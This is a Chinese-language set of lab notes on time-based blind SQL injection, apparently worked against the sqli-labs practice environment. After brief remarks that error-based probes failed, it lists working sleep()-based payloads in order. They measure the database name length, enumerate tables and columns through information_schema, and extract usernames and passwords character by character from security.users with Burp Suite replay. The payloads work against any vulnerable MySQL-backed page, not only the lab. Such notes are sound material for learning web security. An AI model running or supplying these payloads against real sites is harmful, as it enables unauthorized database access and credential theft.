id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了
id=1 and sleep(5) //未延迟
id=1' and sleep(5) //延迟(明显加载慢了几秒)
id=1' and if (length(database())>5 ,sleep(5),1) -- + //明显延迟
id=1' and if (length(database())<10 ,sleep(5),1) -- +//明显延迟
id=1' and if (length(database())=6 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=7 ,sleep(5),1) -- +//未延迟
id=1' and if (length(database())=8 ,sleep(5),1) -- +//明显延迟
id=1' and if(ascii(substr(database(),1,1))=1,sleep(5),1) -- +
id=1' and if((select count(table_name) from information_schema.tables where table_schema='security')=1,sleep(5),1) -- +
id=1' and if((length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1),sleep(5),1) -- +
id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=1),sleep(5),1) -- +
结合上文,推测users表是我们想要爆破的用户密码表
结合burpsuite的重放攻击,设置1个payload
id=1' and if((select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=1,sleep(5),1) --+
id=1' and if((length(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1))=1),sleep(5),1) --+
id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=1),sleep(5),1) --+
id=1' and if((select count(username) from security.users)=1,sleep(5),1) --+
id=1' and (select count(username) from security.users)=1 -- +
id=1' and if((length(substr((select concat(username,password) from security.users limit 0,1),1))=1),sleep(5),1) --+
id=1' and if((ascii(substr((select concat(username,password) from security.users limit 0,1),1,1))=1),sleep(5),1) --+